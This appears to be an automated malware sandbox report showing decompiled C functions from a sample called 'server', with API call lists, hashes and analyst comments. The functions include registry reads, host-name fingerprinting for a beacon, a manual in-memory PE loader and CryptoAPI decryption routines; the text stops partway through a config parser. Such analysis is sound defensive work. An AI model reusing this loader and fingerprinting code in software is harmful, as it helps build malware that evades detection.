            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: ArraySafe$CreateDestroyFreeString
            • String ID:
            • API String ID: 3098518882-0
            • Opcode ID: fa63b107f1f63d4bbd4b1e82b19e84521316c31260260d579fdd1d3cb6b438d8
            • Instruction ID: aedbc8482a35b6c8b199c00469b9a9645429733752634d14d528484f418c11dd
            • Opcode Fuzzy Hash: fa63b107f1f63d4bbd4b1e82b19e84521316c31260260d579fdd1d3cb6b438d8
            • Instruction Fuzzy Hash: 0F11337590010ABFDB11DF95CC05DEEBBB9EF08714F008115EA05A7260E775AA159B91
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			/* Analyst note: registry value read under 0x80000002 (HKEY_LOCAL_MACHINE). When _a4
            			   is non-null the OLE/BSTR path E047E2839 is tried first; otherwise, or if it fails,
            			   E047E58BD is used. The returned buffer (_a4, byte length _a12) is NUL-terminated
            			   as a wide string and stored through __edi; an empty result is freed from the
            			   private heap at 0x47ea2d8 and status 2 is returned. */
            			E047E33F1(intOrPtr* __edi, void* _a4, intOrPtr _a8, unsigned int _a12) {
            				void* _t21;
            				void* _t22;
            				signed int _t24;
            				intOrPtr* _t26;
            				void* _t27;
            
            				_t26 = __edi;
            				if(_a4 == 0) {
            					L2:
            					_t27 = E047E58BD(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
            					if(_t27 == 0) {
            						_t24 = _a12 >> 1;
            						if(_t24 == 0) {
            							_t27 = 2;
            							HeapFree( *0x47ea2d8, 0, _a4);
            						} else {
            							_t21 = _a4;
            							 *((short*)(_t21 + _t24 * 2 - 2)) = 0;
            							 *_t26 = _t21;
            						}
            					}
            					L6:
            					return _t27;
            				}
            				_t22 = E047E2839(_a4, _a8, _a12, __edi); // executed
            				_t27 = _t22;
            				if(_t27 == 0) {
            					goto L6;
            				}
            				goto L2;
            			}

            APIs
              • Part of subcall function 047E2839: SysFreeString.OLEAUT32(00000000), ref: 047E289C
            • HeapFree.KERNEL32(00000000,00000000,00000000,80000002,746AF710,?,00000000,?,00000000,?,047E528E,?,004F0053,05429218,00000000,?), ref: 047E3454
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: Free$HeapString
            • String ID: Uet
            • API String ID: 3806048269-2766386878
            • Opcode ID: b6b627693b891c682e60becbd07ed2a41b132c3c6b06c28d0930750b721e4773
            • Instruction ID: e41c5d218663a198f4307a27c844315e8d9b8ce590740d8c49292bced98ae406
            • Opcode Fuzzy Hash: b6b627693b891c682e60becbd07ed2a41b132c3c6b06c28d0930750b721e4773
            • Instruction Fuzzy Hash: CB012832500619BBDB239F96CC04EFA3BA9EF48750F048625FE099B220D731A961DBD0
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 37%
            			/* Analyst note: classic two-call GetComputerNameExA pattern with NameType 3
			   (ComputerNameDnsFullyQualified). The first call with a NULL buffer yields the
			   required size, a heap buffer is allocated via E047E33DC (RtlAllocateHeap), and the
			   second call fills it; on failure the buffer is released with E047E61DA (RtlFreeHeap)
			   and NULL is returned. Host fingerprinting for the later beacon. */
            			E047E472F(void* __ecx) {
            				signed int _v8;
            				void* _t15;
            				void* _t19;
            				void* _t20;
            				void* _t22;
            				intOrPtr* _t23;
            
            				_t23 = __imp__;
            				_t20 = 0;
            				_v8 = _v8 & 0;
            				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
            				_t10 = _v8;
            				if(_v8 != 0) {
            					_t20 = E047E33DC(_t10 + 1);
            					if(_t20 != 0) {
            						_t15 =  *_t23(3, _t20,  &_v8); // executed
            						if(_t15 != 0) {
            							 *((char*)(_v8 + _t20)) = 0;
            						} else {
            							E047E61DA(_t20);
            							_t20 = 0;
            						}
            					}
            				}
            				return _t20;
            			}

            APIs
            • GetComputerNameExA.KERNELBASE(00000003,00000000,047E3DCD,00000000,00000000,?,76B5C740,047E3DCD), ref: 047E4747
              • Part of subcall function 047E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,047E62F6), ref: 047E33E8
            • GetComputerNameExA.KERNELBASE(00000003,00000000,047E3DCD,047E3DCE,?,76B5C740,047E3DCD), ref: 047E4764
              • Part of subcall function 047E61DA: RtlFreeHeap.NTDLL(00000000,00000000,047E6383,00000000,?,00000000,00000000), ref: 047E61E6
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: ComputerHeapName$AllocateFree
            • String ID:
            • API String ID: 187446995-0
            • Opcode ID: 89a0f5632de3de12c16161154fd31385e5ac103552a1ba55b0edeead8f33e715
            • Instruction ID: 6a5bb549ac550136d10efb955a9c1f384f3bcf066ef5922da2cdd214a2d8e8f8
            • Opcode Fuzzy Hash: 89a0f5632de3de12c16161154fd31385e5ac103552a1ba55b0edeead8f33e715
            • Instruction Fuzzy Hash: F7F0B47660011AFAEB11D6ABCC08EBF3BACEBC9645F500155E904D3240EA70EE0186B0
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			/* Analyst note: initialisation. Creates a private, growable heap with a 4 MB initial
            			   reservation (HeapCreate(0, 0x400000, 0)) and stores the handle at 0x47ea2d8, which
            			   the other functions in this module use for HeapFree/RtlFreeHeap; records the start
            			   tick at 0x47ea1c8; then runs E047E54D8, E047E213E, E047E6392 and E047E2523 in
            			   sequence. Returns 8 (ERROR_NOT_ENOUGH_MEMORY) when the heap cannot be created. */
            			E047E5006(signed int __edx, intOrPtr _a4) {
            				void* _t3;
            				void* _t5;
            				void* _t7;
            				void* _t8;
            				void* _t9;
            				signed int _t10;
            
            				_t10 = __edx;
            				_t3 = HeapCreate(0, 0x400000, 0); // executed
            				 *0x47ea2d8 = _t3;
            				if(_t3 == 0) {
            					_t8 = 8;
            					return _t8;
            				}
            				 *0x47ea1c8 = GetTickCount();
            				_t5 = E047E54D8(_a4);
            				if(_t5 == 0) {
            					_t5 = E047E213E(_t9, _a4); // executed
            					if(_t5 == 0) {
            						if(E047E6392(_t9) != 0) {
            							 *0x47ea300 = 1; // executed
            						}
            						_t7 = E047E2523(_t10); // executed
            						return _t7;
            					}
            				}
            				return _t5;
            			}

            APIs
            • HeapCreate.KERNELBASE(00000000,00400000,00000000,047E107E,?), ref: 047E500F
            • GetTickCount.KERNEL32 ref: 047E5023
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: CountCreateHeapTick
            • String ID:
            • API String ID: 2177101570-0
            • Opcode ID: 0b27fa557c322b04812bb7f5700adce201c12989a7a1708c035b05f28b84cdd6
            • Instruction ID: c7f112157844f9da14a987702e0e15b8e69bff38abb9e5d505e65b3bd1700451
            • Opcode Fuzzy Hash: 0b27fa557c322b04812bb7f5700adce201c12989a7a1708c035b05f28b84cdd6
            • Instruction Fuzzy Hash: 29F06D7174430AFAEB612FB3A91877537A4AB4C70CF508B25F901D8382EBB5F8009A61
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • RtlAllocateHeap.NTDLL(00000008,?), ref: 00411AE5
            Memory Dump Source
            • Source File: 00000000.00000002.523801722.000000000040F000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040F000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_40f000_server.jbxd
            Similarity
            • API ID: AllocateHeap
            • String ID:
            • API String ID: 1279760036-0
            • Opcode ID: ffc422ddd39041b05de87dbb1cc33fb912c3cbe10e636ac8d1964e38e8d4c3fb
            • Instruction ID: 8f1e6770ac83704bff406797ba9c9fc97c9d0a6c2db46855d965d7ba77dce368
            • Opcode Fuzzy Hash: ffc422ddd39041b05de87dbb1cc33fb912c3cbe10e636ac8d1964e38e8d4c3fb
            • Instruction Fuzzy Hash: 0D01B1353062159BEB249F65DC04BA73798AF917A0F05452AEE158B2B0E77CAC80C698
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 34%
            			/* Analyst note: fetches a value under 0x80000002 (HKEY_LOCAL_MACHINE) through
            			   E047E790B into a VARIANT on the stack (_v20 holds vt, _v12 the data). Only VT_BSTR
            			   (vt == 8) is accepted: the string is copied with E047E661C, stored through _a16,
            			   and the BSTR is released with SysFreeString (OLEAUT32 ordinal #6). Returns the
            			   failing HRESULT, 1 for a non-BSTR result, or 0 on success. */
            			E047E2839(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
            				intOrPtr _v12;
            				void* _v18;
            				char _v20;
            				intOrPtr _t15;
            				void* _t17;
            				intOrPtr _t19;
            				void* _t23;
            
            				_v20 = 0;
            				asm("stosd");
            				asm("stosd");
            				asm("stosd");
            				asm("stosw");
            				_t15 =  *0x47ea348; // 0xc3d5a8
            				_t4 = _t15 + 0x47eb3e8; // 0x5428990
            				_t20 = _t4;
            				_t6 = _t15 + 0x47eb174; // 0x650047
            				_t17 = E047E790B(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
            				if(_t17 < 0) {
            					_t23 = _t17;
            				} else {
            					_t23 = 8;
            					if(_v20 != _t23) {
            						_t23 = 1;
            					} else {
            						_t19 = E047E661C(_t20, _v12);
            						if(_t19 != 0) {
            							 *_a16 = _t19;
            							_t23 = 0;
            						}
            						__imp__#6(_v12);
            					}
            				}
            				return _t23;
            			}

            APIs
              • Part of subcall function 047E790B: SysFreeString.OLEAUT32(?), ref: 047E79EA
              • Part of subcall function 047E661C: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,047E4B72,004F0053,00000000,?), ref: 047E6625
              • Part of subcall function 047E661C: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,047E4B72,004F0053,00000000,?), ref: 047E664F
              • Part of subcall function 047E661C: memset.NTDLL ref: 047E6663
            • SysFreeString.OLEAUT32(00000000), ref: 047E289C
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: FreeString$lstrlenmemcpymemset
            • String ID:
            • API String ID: 397948122-0
            • Opcode ID: b3ee12019f5fbf44f3a10e7530a1463a4eb02c51cc3be041ca219799f0f228d1
            • Instruction ID: aa077b9ea9ef1dab5c8d5dd0e04db8402c098dc9b5c2ee3da943c5ff71a198bf
            • Opcode Fuzzy Hash: b3ee12019f5fbf44f3a10e7530a1463a4eb02c51cc3be041ca219799f0f228d1
            • Instruction Fuzzy Hash: 7301B1B2500119BFDB81DFAACC04DAABBB8FF0C350F004665E902E7261E771A912C790
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • LoadLibraryW.KERNELBASE(02B54000,00414A97), ref: 00414749
            Memory Dump Source
            • Source File: 00000000.00000002.523801722.000000000040F000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040F000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_40f000_server.jbxd
            Similarity
            • API ID: LibraryLoad
            • String ID:
            • API String ID: 1029625771-0
            • Opcode ID: 60b703b22f914805831b0cf53231d61d5b884dcc1632bd1b8addb44175fccc55
            • Instruction ID: cc7f045297b93ef6274fd01b4fdcab6efc4b6845af6071ac66646583cad711a3
            • Opcode Fuzzy Hash: 60b703b22f914805831b0cf53231d61d5b884dcc1632bd1b8addb44175fccc55
            • Instruction Fuzzy Hash: 5FE09264A98360CAE70ADF10F5283113672FF14784FA8AC1D9159CF261E7B604F49B69
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 37%
            			/* Analyst note: builds a SECURITY_ATTRIBUTES structure at 0x404188
            			   (nLength = 0xc, lpSecurityDescriptor at 0x40418c, bInheritHandle at 0x404190 = 0)
            			   by converting the SDDL string at _a4 with
            			   ConvertStringSecurityDescriptorToSecurityDescriptorA (revision 1), called via the
            			   import stub L00401682. */
            			E00401D3C(void* __eax, intOrPtr _a4) {
            
            				 *0x404190 =  *0x404190 & 0x00000000;
            				_push(0);
            				_push(0x40418c);
            				_push(1);
            				_push(_a4);
            				 *0x404188 = 0xc; // executed
            				L00401682(); // executed
            				return __eax;
            			}

            APIs
            • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(004013CC,00000001,0040418C,00000000), ref: 00401D5A
            Memory Dump Source
            • Source File: 00000000.00000002.523699854.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.523699854.0000000000403000.00000040.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.523699854.0000000000405000.00000040.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.523699854.0000000000407000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_server.jbxd
            Similarity
            • API ID: DescriptorSecurity$ConvertString
            • String ID:
            • API String ID: 3907675253-0
            • Opcode ID: d44a2a0f54f5e6775fd6c1e8a7c4d446c5909fbbc7626a237563b1b511256517
            • Instruction ID: 8b1a9882f0f7b6f5a619b3d6300b2bdd32795284b236dc0e31706888a106ff8d
            • Opcode Fuzzy Hash: d44a2a0f54f5e6775fd6c1e8a7c4d446c5909fbbc7626a237563b1b511256517
            • Instruction Fuzzy Hash: AFC04CF4140300B7E620AB409D5AF057A5577A4715F61062DFB04391E1C3F91094952D
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			/* Analyst note: allocation wrapper; the heap handle lives at 0x404160. */
            			E004012E6(long _a4) {
            				void* _t2;
            
            				_t2 = RtlAllocateHeap( *0x404160, 0, _a4); // executed
            				return _t2;
            			}

            APIs
            • RtlAllocateHeap.NTDLL(00000000,?,00401A18,00000030,?,00000000), ref: 004012F2
            Memory Dump Source
            • Source File: 00000000.00000002.523699854.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.523699854.0000000000403000.00000040.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.523699854.0000000000405000.00000040.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.523699854.0000000000407000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_server.jbxd
            Similarity
            • API ID: AllocateHeap
            • String ID:
            • API String ID: 1279760036-0
            • Opcode ID: 8d53e43e4fecd4b65d19afa8ec6fbbeba3cde750ccf00ed1d63409ce6b8d1d85
            • Instruction ID: e72f98105ba7c706faca8ef9926cddb4ff6cd2f9e0c1ce1923eff6ceed1ee1be
            • Opcode Fuzzy Hash: 8d53e43e4fecd4b65d19afa8ec6fbbeba3cde750ccf00ed1d63409ce6b8d1d85
            • Instruction Fuzzy Hash: 92B012B1100100ABCA118F11EF08F06BE31B7E4701F004030B3042407482314C20FB1D
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			/* Analyst note: free wrapper matching E004012E6; same heap handle at 0x404160. */
            			E00401BA9(void* _a4) {
            				char _t2;
            
            				_t2 = RtlFreeHeap( *0x404160, 0, _a4); // executed
            				return _t2;
            			}

            APIs
            • RtlFreeHeap.NTDLL(00000000,00000030,004017ED,00000000,00000030,00000000,00000000,00000030,?,?,?,?,?,00401A66), ref: 00401BB5
            Memory Dump Source
            • Source File: 00000000.00000002.523699854.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.523699854.0000000000403000.00000040.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.523699854.0000000000405000.00000040.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.523699854.0000000000407000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_server.jbxd
            Similarity
            • API ID: FreeHeap
            • String ID:
            • API String ID: 3298025750-0
            • Opcode ID: 3b8eee9051a441d58e5db666830f183a15b7cffca9eb150e625e3af0535b1606
            • Instruction ID: ce698fd0423bda5088509b7a42681047dd9c8e559710f82c1ef419a06116bbed
            • Opcode Fuzzy Hash: 3b8eee9051a441d58e5db666830f183a15b7cffca9eb150e625e3af0535b1606
            • Instruction Fuzzy Hash: 8AB01271000100BBCA118F10EF08F067F21B7E4701F008030B3046407482314D60FB0C
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 86%
            			/* Analyst note: manual PE loader for the image at __eax. Offset 0x3c is e_lfanew;
            			   NT header + 0x50 is SizeOfImage, from which the allocation size _t33 is derived.
            			   E00401202 resolves API pointers (GetModuleHandleA/GetProcAddress), E00401BC4 maps
            			   the image, E00401000 resolves imports (LoadLibraryA), E004014CF applies section
            			   protections (VirtualProtect). The entry point (NT header + 0x28, AddressOfEntryPoint)
            			   is then called as a DllMain with reason 1 (DLL_PROCESS_ATTACH); GetLastError is
            			   returned if it fails. Cleanup goes through the function table at _v12 and E00401BA9. */
            			E004012FB(void* __eax) {
            				char _v8;
            				void* _v12;
            				void* __edi;
            				void* _t18;
            				long _t24;
            				long _t26;
            				long _t29;
            				intOrPtr _t40;
            				void* _t41;
            				void* _t42;
            				void* _t44;
            
            				_t41 = __eax;
            				_t16 =  *0x404180;
            				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x404180 - 0x43174ac4 &  !( *0x404180 - 0x43174ac4);
            				_t18 = E00401202( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x404180 - 0x43174ac4 &  !( *0x404180 - 0x43174ac4),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x404180 - 0x43174ac4 &  !( *0x404180 - 0x43174ac4), _t16 + 0xbce8a57d,  &_v8,  &_v12); // executed
            				if(_t18 != 0) {
            					_t29 = 8;
            					goto L8;
            				} else {
            					_t40 = _v8;
            					_t29 = E00401BC4(_t33, _t40, _t41);
            					if(_t29 == 0) {
            						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
            						_t24 = E00401000(_t40, _t44); // executed
            						_t29 = _t24;
            						if(_t29 == 0) {
            							_t26 = E004014CF(_t44, _t40); // executed
            							_t29 = _t26;
            							if(_t29 == 0) {
            								_push(_t26);
            								_push(1);
            								_push(_t40);
            								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
            									_t29 = GetLastError();
            								}
            							}
            						}
            					}
            					_t42 = _v12;
            					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
            					E00401BA9(_t42);
            					L8:
            					return _t29;
            				}
            			}

            APIs
              • Part of subcall function 00401202: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,00401337,?,?,?,?,?,00000002,?,?), ref: 00401226
              • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 00401248
              • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 0040125E
              • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 00401274
              • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 0040128A
              • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 004012A0
              • Part of subcall function 00401000: LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 00401038
              • Part of subcall function 004014CF: VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,?), ref: 00401508
              • Part of subcall function 004014CF: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 0040157D
              • Part of subcall function 004014CF: GetLastError.KERNEL32 ref: 00401583
            • GetLastError.KERNEL32(?,?), ref: 00401379
            Memory Dump Source
            • Source File: 00000000.00000002.523699854.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.523699854.0000000000403000.00000040.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.523699854.0000000000405000.00000040.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.523699854.0000000000407000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_server.jbxd
            Similarity
            • API ID: AddressProc$ErrorLastProtectVirtual$HandleLibraryLoadModule
            • String ID:
            • API String ID: 3135819546-0
            • Opcode ID: 336f5482e3aed059344eafb9dfd841dc67045812ccfd429b7a3489f36f6440d7
            • Instruction ID: 9c7335bcc5d41c3ee7976e84fb0b4f56712358cbe666051dfec51b4dde3629c0
            • Opcode Fuzzy Hash: 336f5482e3aed059344eafb9dfd841dc67045812ccfd429b7a3489f36f6440d7
            • Instruction Fuzzy Hash: 8B11E976600301ABD711ABA68C85DAB77BCAF98318704017EFD01B7A91EA74ED068798
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 75%
            			/* Analyst note: measures the buffer at _a4 with lstrlen (the __imp__ call), runs it
            			   through the CryptoAPI routine E047E1508 (CryptAcquireContextW, CryptImportKey,
            			   CryptSetKeyParam per the API list below), allocates a result buffer of twice that
            			   length from the private heap (E047E33DC), post-processes it with E047E22EA, and
            			   frees the input buffer (E047E61DA). Returns the result buffer or NULL. */
            			E047E5063(void* __ecx, void* __edx, void* _a4, void* _a8) {
            				void* _t13;
            				void* _t21;
            
            				_t11 =  &_a4;
            				_t21 = 0;
            				__imp__( &_a8);
            				_t13 = E047E1508( &_a4 + 1, 1, _a8, _a4, _a4, _t11); // executed
            				if(_t13 == 0) {
            					_t21 = E047E33DC(_a8 + _a8);
            					if(_t21 != 0) {
            						E047E22EA(_a4, _t21, _t23);
            					}
            					E047E61DA(_a4);
            				}
            				return _t21;
            			}

            APIs
            • lstrlen.KERNEL32(00000000,00000000,047E3ECE,00000000,?,047E66D9,00000000,047E3ECE,?,76B5C740,047E3ECE,00000000,05429600), ref: 047E5074
              • Part of subcall function 047E1508: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,047E5088,00000001,047E3ECE,00000000), ref: 047E1540
              • Part of subcall function 047E1508: memcpy.NTDLL(047E5088,047E3ECE,00000010,?,?,?,047E5088,00000001,047E3ECE,00000000,?,047E66D9,00000000,047E3ECE,?,76B5C740), ref: 047E1559
              • Part of subcall function 047E1508: CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 047E1582
              • Part of subcall function 047E1508: CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 047E159A
              • Part of subcall function 047E1508: memcpy.NTDLL(00000000,76B5C740,05429600,00000010), ref: 047E15EC
              • Part of subcall function 047E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,047E62F6), ref: 047E33E8
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: Crypt$memcpy$AcquireAllocateContextHeapImportParamlstrlen
            • String ID:
            • API String ID: 894908221-0
            • Opcode ID: e647c420634cbed2a76afdea96e966a64409197ecc08e79df8d4c9f7bac61ec5
            • Instruction ID: 11d7e9f8eb4bc0c02da0b66856ad5dc81005057f4eb015503e025df6f97a1ae2
            • Opcode Fuzzy Hash: e647c420634cbed2a76afdea96e966a64409197ecc08e79df8d4c9f7bac61ec5
            • Instruction Fuzzy Hash: B1F0547610010DBBDF126F96DC04DEA3B6DEF8C369B408511FD09CA210DA71E55597A0
            Uniqueness

            Uniqueness Score: -1.00%

            Non-executed Functions

            C-Code - Quality: 93%
            			E047E1D8A(void* __ebx, int* __ecx, void* __edx, void* __edi, void* __esi) {
            				int _v8;
            				void* _v12;
            				void* _v16;
            				signed int _t28;
            				signed int _t33;
            				signed int _t39;
            				char* _t45;
            				char* _t46;
            				char* _t47;
            				char* _t48;
            				char* _t49;
            				char* _t50;
            				void* _t51;
            				void* _t52;
            				void* _t53;
            				intOrPtr _t54;
            				void* _t56;
            				intOrPtr _t57;
            				intOrPtr _t58;
            				signed int _t61;
            				intOrPtr _t64;
            				signed int _t65;
            				signed int _t70;
            				void* _t72;
            				void* _t73;
            				signed int _t75;
            				signed int _t78;
            				signed int _t82;
            				signed int _t86;
            				signed int _t90;
            				signed int _t94;
            				signed int _t98;
            				void* _t101;
            				void* _t102;
            				void* _t116;
            				void* _t119;
            				intOrPtr _t122;
            
            				_t119 = __esi;
            				_t116 = __edi;
            				_t104 = __ecx;
            				_t101 = __ebx;
            				_t28 =  *0x47ea344; // 0x43175ac3
            				if(E047E10F8( &_v8,  &_v12, _t28 ^ 0xa23f04a7) != 0 && _v12 >= 0x110) {
            					 *0x47ea374 = _v8;
            				}
            				_t33 =  *0x47ea344; // 0x43175ac3
            				if(E047E10F8( &_v16,  &_v12, _t33 ^ 0x2bfce340) == 0) {
            					_v12 = 2;
            					L69:
            					return _v12;
            				}
            				_t39 =  *0x47ea344; // 0x43175ac3
            				_push(_t116);
            				if(E047E10F8( &_v12,  &_v8, _t39 ^ 0xcca68722) == 0) {
            					L67:
            					HeapFree( *0x47ea2d8, 0, _v16);
            					goto L69;
            				} else {
            					_push(_t101);
            					_t102 = _v12;
            					if(_t102 == 0) {
            						_t45 = 0;
            					} else {
            						_t98 =  *0x47ea344; // 0x43175ac3
            						_t45 = E047E36C5(_t104, _t102, _t98 ^ 0x523046bc);
            					}
            					_push(_t119);
            					if(_t45 != 0) {
            						_t104 =  &_v8;
            						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
            							 *0x47ea2e0 = _v8;
            						}
            					}
            					if(_t102 == 0) {
            						_t46 = 0;
            					} else {
            						_t94 =  *0x47ea344; // 0x43175ac3
            						_t46 = E047E36C5(_t104, _t102, _t94 ^ 0x0b3e0d40);
            					}
            					if(_t46 != 0) {
            						_t104 =  &_v8;
            						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
            							 *0x47ea2e4 = _v8;
            						}
            					}
            					if(_t102 == 0) {
            						_t47 = 0;
            					} else {
            						_t90 =  *0x47ea344; // 0x43175ac3
            						_t47 = E047E36C5(_t104, _t102, _t90 ^ 0x1b5903e6);
            					}
            					if(_t47 != 0) {
            						_t104 =  &_v8;
            						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
            							 *0x47ea2e8 = _v8;
            						}
            					}
            					if(_t102 == 0) {
            						_t48 = 0;
            					} else {
            						_t86 =  *0x47ea344; // 0x43175ac3
            						_t48 = E047E36C5(_t104, _t102, _t86 ^ 0x267c2349);
            					}
            					if(_t48 != 0) {
            						_t104 =  &_v8;
            						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
            							 *0x47ea004 = _v8;
            						}
            					}
            					if(_t102 == 0) {
            						_t49 = 0;
            					} else {
            						_t82 =  *0x47ea344; // 0x43175ac3
            						_t49 = E047E36C5(_t104, _t102, _t82 ^ 0x167db74c);
            					}
            					if(_t49 != 0) {
            						_t104 =  &_v8;
            						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
